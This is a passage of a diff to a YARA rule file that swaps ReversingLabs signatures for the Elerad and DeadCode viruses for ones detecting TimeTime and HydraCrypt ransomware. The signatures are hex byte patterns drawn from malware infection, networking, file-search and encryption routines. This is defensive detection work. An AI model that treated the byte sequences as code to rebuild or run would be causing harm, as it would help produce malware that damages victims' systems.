+            C6 85 ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ??
+            ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 66
+            8B 85 ?? ?? ?? ?? 8B D0 66 81 E2 ?? ?? 88 95 ?? ?? ?? ?? 0F B7 C0 C1 E8 ?? 88 85 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ??
+            ?? ?? 40 74 ?? B3 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64
+            89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ??
+            ?? ?? ?? C3
+        }
+		$file_search_1_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 C3 85 DB 74
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74 ?? 8B 45 ?? 50 8D
+            85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 80 38 ?? 75 ??
+            8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8
+        }
+		$file_search_1_2 = {
+            8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84 ?? ??
+            ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6 8B D0
+            03 D3 42 81 FA ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 40 50 56 8D 85 ?? ?? ?? ?? 03 C3 50 E8
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+        }
+		$file_search_1_3 = {
+            8B F0 83 FE ?? 74 ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 53 ??
+            03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3 48 50 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85 ?? ?? ??
+            ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$raw_socket_connection_2 = {
+            55 8B EC 83 C4 ?? 53 56 8B F2 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 8D 45 ??
+            33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8B C6 86 E0 66 89 45 ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B C3 E8
+            ?? ?? ?? ?? 83 CB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ??
+            C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $negt_infector at pe.entry_point ) or ( ( $negt_body_and_infector_1 at pe.entry_point ) and $negt_body_and_infector_2 and $negt_body_and_infector_3 and $negt_body_and_infector_4 ) )
+		uint16( 0 ) == 0x5A4D and ( ( $http_connection_1 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3 and $raw_socket_connection_1_1 and $raw_socket_connection_1_2 and $raw_socket_connection_1_3 and $raw_socket_connection_1_4 and $raw_socket_connection_1_5 ) or ( $raw_socket_connection_2 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3 ) )
 }
-
-rule REVERSINGLABS_Win32_Virus_Elerad : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timetime : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Elerad virus."
+		description = "Yara rule that detects TimeTime ransomware."
 		author = "ReversingLabs"
-		id = "0307a136-ea2c-584c-bfda-f41e2c46fd09"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "27bff941-01ce-5bf7-a9d8-d01d2db3bfd3"
+		date = "2022-02-21"
+		modified = "2022-02-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Elerad.yara#L3-L33"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.TimeTime.yara#L1-L75"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "930594bf99daf55ef02542ce7b393c1c23ead75946b3da3b555102a2e7142e33"
+		logic_hash = "43867dd793bc84e6f39ca2de1aff4047a742b295dc4df94cd337bd2ef89e4a62"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Elerad"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TimeTime"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$elerad_body = {
-            EB 77 60 E8 09 00 00 00 8B 64 24 08 E9 DD 01 00 00 33 D2 64 FF 32 64 89 22 50 8B D8 B9 FF 00 00 00 81 38 2E 65 78 65 74
-            08 40 E2 F5 E9 BD 01 00 00 32 D2 38 50 04 0F 85 B2 01 00 00 33 D2 80 38 5C 74 07 3B C3 74 07 48 E2 F4 88 10 8B D0 58 BE
-            00 00 E6 77 BF 23 C1 AB 00 EB 3E 60 E8 09 00 00 00 8B 64 24 08 E9 84 01 00 00 33 D2 64 FF 32 64 89 22 BE 00 00 E6 77 EB
-            20 68 ?? ?? ?? ?? 60 8B 74 24 24 E8 09 00 00 00 8B 64 24 08 E9 5D 01 00 00 33 D2 64 FF 32 64 89 22 E8 00 00 00 00 5D 81
-            ED ?? ?? ?? ?? 81 FF 23 C1 AB 00 75 0C 89 95 22 12 40 00 89 85 1E 12 40 00 BA ?? ?? ?? ?? B9 09 02 00 00 8D 85 D0 10 40
-            00 31 10 83 C0 04 E2 F9
+		$rename_files = {
+            00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 00 07 28 ?? ?? ??
+            ?? 16 FE 01 0C 08 2C ?? 2B ?? 00 00 07 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 00 DC 2A
+        }
+		$find_files = {
+            00 73 ?? ?? ?? ?? 0A 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 07 2C ?? 06 0C DD ?? ?? ??
+            ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C
+            ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ??
+            ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DE ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11
+            ?? 11 ?? 9A 13 ?? 00 06 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69
+            32 ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 00 06 11 ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? 13 ??
+            00 00 DE ?? 06 0C 2B ?? 08 2A
+        }
+		$encrypt_folder = {
+            00 02 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C
+            00 00 08 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 0D 09 2C ?? 00 16 13 ?? 16 13 ?? 08 73
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 08 19
+            73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 00 DE ??
+            11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 11 ?? 16 FE 01 11 ?? 5F 11 ?? 5F 13 ?? 11 ?? 2C
+            ?? 00 08 28 ?? ?? ?? ?? 00 00 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ??
+            ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A
+        }
+		$encrypt_files = {
+            00 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 2C ?? 38 ?? ?? ?? ?? 02 7E ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 0D 09 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 0A 06 8E 69 8D ?? ?? ?? ?? 0B 16 13 ?? 2B
+            ?? 00 06 11 ?? 91 13 ?? 11 ?? 17 58 D1 13 ?? 11 ?? D2 13 ?? 07 11 ?? 11 ?? 9C 00 11 ??
+            17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 02 07 28 ?? ?? ?? ?? 00 02 02 7E ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 7E
+            ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 00 2A
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $elerad_body at pe.entry_point )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $encrypt_folder ) and ( $rename_files )
 }
-
-rule REVERSINGLABS_Win32_Virus_Deadcode : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Hydracrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects DeadCode virus."
+		description = "Yara rule that detects HydraCrypt ransomware."
 		author = "ReversingLabs"
-		id = "89ec2e39-a163-5ba6-9b19-9c94b1923d47"
+		id = "2e780f7c-8d6d-51c8-b65e-330cc3b17bb7"
 		date = "2020-06-26"
 		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.DeadCode.yara#L3-L76"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HydraCrypt.yara#L1-L174"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6ac2e48daaed222f0a19afd4d03a02834705e0e3762db3217f68569554171846"
+		logic_hash = "910a6f23f06cecb8d3115ebfed42a66412dbd0d3a519e39f21df81b0c2028f48"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "DeadCode"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HydraCrypt"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$deadcode_ep_1 = {
-            64 67 FF 36 30 00 58 8B 40 08 FF 70 48 5B FF 70 4C 5A 03 40 44
-            FF E0
+		$remote_connection_1 = {
+            55 8B EC 83 EC ?? 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 BE ?? ?? ?? ?? 56
+            33 DB 53 53 6A ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ??
+            59 59 53 53 6A ?? 53 53 6A ?? FF 75 ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 56 53 53 68 ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ?? FF D0 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ??
+            ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            BF ?? ?? ?? ?? 57 89 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 56 50 57 FF 75 ?? E8 ?? ?? ?? ??
+            83 C4 ?? 5F 39 5D ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 39 5D ?? 74 ?? FF 75 ?? E8 ??
+            ?? ?? ?? 59 39 5D ?? 5E 5B 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 C9 C3
         }
-		$deadcode_marker = {
-            DE C0 AD DE
+		$remote_connection_2 = {
+            55 8B EC 83 EC ?? 53 56 57 6A ?? 59 68 ?? ?? ?? ?? 33 DB BE ?? ?? ?? ?? 8D 7D ?? 6A
+            ?? 89 5D ?? F3 A5 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 53 8D 4D ?? 51 FF D0 8B
+            F8 3B FB 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 68
+            ?? ?? ?? ?? 53 53 FF 75 ?? 57 FF D0 8B F0 3B F3 75 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 68
+            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 59 59 8D 4D ?? 51 6A ?? 8D 4D ?? 51 56 FF D0 39 5D ?? 75 ?? 57 E8 ??
+            ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 40 EB ?? 68 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 4D ?? 51 FF D0 33 C9 3B C8 1B C0
+            F7 D8 5F 5E 5B C9 C3
         }
-		$deadcode_ep_2 = {
-            2B C0 85 C0 74 0E 64 67 FF 36 00 00 64 67 89 26 00 00 89 00 E8
-            ED FF FF FF 8B 74 24 0C 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50
-            4C 03 40 44 89 86 B8 00 00 00 89 86 B0 00 00 00 89 9E A4 00 00
-            00 89 96 A8 00 00 00 2B C0 C3
+		$remote_connection_3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D
+            45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 56 53 FF D0 56
+            50 89 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF D0 BF ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ??
+            ?? 59 59 85 DB 7E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 8B C3 6A ?? 99 59
+            F7 F9 85 D2 75 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B 45 ?? 0F B6 04 03
+            50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 43 3B DE 7C ?? E8 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 50 56 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 83 C4 ?? 83 7D ?? ?? BB ?? ?? ?? ?? BE ?? ?? ??
+            ?? 75 ?? 53 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ??
+            75 ?? 53 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F
+            5E 5B C9 C3
         }
-		$deadcode_ep_3 = {
-            B8 DE C0 AD DE 50 5A 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50 4C
-            03 40 44 FF D0
+		$encrypt_files_1 = {
+            8A 45 ?? 04 ?? 66 98 66 89 45 ?? 0F B7 C0 50 8D 45 ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68
+            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 FF D0 8B F0 83 FE ?? 74 ?? 83
+            FE ?? 74 ?? 83 FE ?? 75 ?? FF 75 ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 57 6A ?? E8 ?? ?? ??
+            ?? 59 59 68 ?? ?? ?? ?? FF D0 FF 45 ?? 83 7D ?? ?? 0F 8C ?? ?? ?? ?? 83 3D ?? ?? ??
+            ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 BE
+            ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8
+            ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ??
+            75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 56 6A
+            ?? E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 6A ?? 53 53 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 53 FF D0 57 6A ?? E8 ?? ?? ??
+            ?? 59 59 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 5F
+            5E 33 C0 5B C9 C2
         }
-		$deadcode_body_1 = {
-            8B D0 8B EA 81 C5 ?? ?? ?? ?? 89 85 A4 00 00 00 89 9D C0 00 00 00 E8 56 01 00 00 89
-            45 00 8D 75 04 81 C2 ?? ?? ?? ?? 6A 19 FF 75 00 52 56 E8 CE 01 00 00 64 67 A1 30 00
-            8B 40 08 89 85 88 00 00 00 C7 85 D0 00 00 00 ?? ?? ?? ?? E8 09 00 00 00 8B 64 24 08
-            E9 03 01 00 00 33 D2 64 FF 32 64 89 22 83 BD C0 00 00 00 00 75 2F 6A 04 68 00 10 00
-            00 68 40 01 00 00 6A 00 FF 55 08 50 8F 45 78 E8 2A 03 00 00 68 00 40 00 00 68 40 01
-            00 00 FF 75 78 FF 55 28 E9 C3 00 00 00 8B 85 A4 00 00 00 05 ?? ?? ?? ?? 8D B5 B4 00
-            00 00 56 6A 00 55 50 68 00 00 10 00 6A 00 FF 55 30 89 85 AC 00 00 00 6A 04 68 00 10
-            00 00 6A 54 6A 00 FF 55 08 89 85 A8 00 00 00 64 67 A1 30 00 8B 40 10 8B 40 3C 8B B5
-            A8 00 00 00 8D 7E 10 56 57 6A 00 6A 00 6A 04 6A 01 6A 00 6A 00 50 6A 00 FF 55 50 85
-            C0 74 5D FF 76 04 8F 85 B0 00 00 00 64 67 A1 30 00 8B 40 08 8B D8 03 5B 3C 8B 5B 28
-            03 D8 8B 8D A4 00 00 00 81 ?? ?? ?? ?? 8D 85 B4 00 00 00 50 6A ?? 51 53 FF 36 FF 55
-            4C FF 76 04 FF 55 54 8D B5 AC 00 00 00 6A FF 6A 01 56 6A 02 FF 55 34 68 00 40 00 00
-            6A 54 FF B5 A8 00 00 00 FF 55 28 33 D2 64 8F 02 5A E8 DB 01 00 00 E8 F5 00 00 00 6A
-            00 FF 55 3C 64 67 8B 36 00 00 AD 83 F8 FF 74 04 8B F0 EB F6 8B 7E 04 81 E7 00 00 FF
-            FF 66 81 3F 4D 5A 74 08 81 EF 00 00 01 00 EB F1 8B DF 03 5B 3C 66 81 3B 50 45 74 02
-            EB E3 8B C7 C3 55 8B EC 8B 75 0C AC 84 C0 75 FB 2B 75 0C 8B CE 8B 5D 08 03 5B 3C 8B
-            5B 78 03 5D 08 8B 53 20 03 55 08 2B C0 8B 32 03 75 08 8B 7D 0C 51 FC F3 A6 59 74 06
+		$encrypt_files_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D
+            45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 89
+            45 ?? 8D 45 ?? 50 66 A5 E8 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 66 A5 BE
+            ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 53 89 45 ?? 8D 45 ?? 53 50 66 A5 E8 ?? ?? ?? ?? 59 50
+            E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 E8 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 BF ??
+            ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 55 ?? 68 ??
+            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ??
+            6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 FF D0 8B F0 53 56 E8 ?? ?? ?? ?? 59
+            59 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF
+            D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
         }
-		$deadcode_body_2 = {
-            83 C2 04 40 EB EB 8B 73 24 03 75 08 2B D2 66 8B 14 46 8B 73 1C 03 75 08 8B 04 96 03
-            45 08 8B E5 5D C2 08 00 55 8B EC 8B 7D 08 8B 75 0C 8B 4D 14 51 56 57 56 FF 75 10 E8
-            91 FF FF FF 5F 5E 59 AB AC 84 C0 75 FB E2 E9 8B E5 5D C2 10 00 8B 6C 24 04 6A 04 68
-            00 10 00 00 68 40 01 00 00 6A 00 FF 55 08 85 C0 74 18 89 45 78 E8 63 01 00 00 68 00
-            40 00 00 68 40 01 00 00 FF 75 78 FF 55 28 6A 00 FF 55 40 C3
+		$encrypt_files_3 = {
+            D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? BE ?? ?? ??
+            ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? FF D0 56 E8 ?? ??
+            ?? ?? 59 3C ?? 75 ?? BE ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D0
+            E8 ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
+            D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
+            D0 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 68 ?? ?? ?? ?? 57 8D 85 ?? ??
+            ?? ?? 50 BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 57 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
